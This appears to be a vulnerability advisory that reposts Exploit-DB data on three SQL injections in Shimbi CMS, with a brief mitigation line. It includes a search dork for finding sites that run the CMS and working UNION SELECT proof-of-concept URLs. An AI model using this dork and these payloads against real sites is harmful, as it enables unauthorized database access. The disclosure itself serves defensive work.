Shimbi CMS Vulnerable to Multiple SQL Injections

vendor:

Shimbi CMS

by:

p0pc0rn

7.5

CVSS

HIGH

SQL Injection

CWE

Product Name: Shimbi CMS

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2020

Shimbi CMS Vulnerable to Multiple SQL Injections

Shimbi CMS is vulnerable to multiple SQL Injections. The first vulnerability is in the details.php parameter, where an attacker can inject a malicious SQL query. The second vulnerability is in the faq_details.php parameter, where an attacker can inject a malicious SQL query. The third vulnerability is in the blog/addComment.php parameter, where an attacker can inject a malicious SQL query.

Mitigation:

Developers should ensure that user input is properly sanitized and validated before being used in a SQL query.

Source

Exploit-DB raw data:

Title  : Shimbi CMS Vulnerable to Multiple SQL Injections
Vendor : http://www.shimbi.in/
Found by : p0pc0rn
Dork   : intext:"Powered By Shimbi CMS" 

SQL Injection in details.php parameter
---------------------------------------
http://site.com/details.php?id=[sql]

POC 
--- 
http://site.com/details.php?id=112 UNION SELECT 1,2,3,4,version(),6,7,8

SQL Injection in faq_details.php parameter
---------------------------------------
http://site.com/faq_details.php?flag=q&id=[sql]

POC
---
http://site.com/faq_details.php?flag=q&id=1'

SQL Injection in blog/addComment.php parameter
---------------------------------------
http://site.com/blog/addComment.php?topic_id=[sql]

POC
---
http://site.com/blog/addComment.php?stat=stat&type=t&category_id=9&topic_id=-122/**/UNION/**/SELECT/**/1,2,version(),4,5,6,7,8,9,10,11,12,13,14,15,16--

thanks,
-p0pc0rn-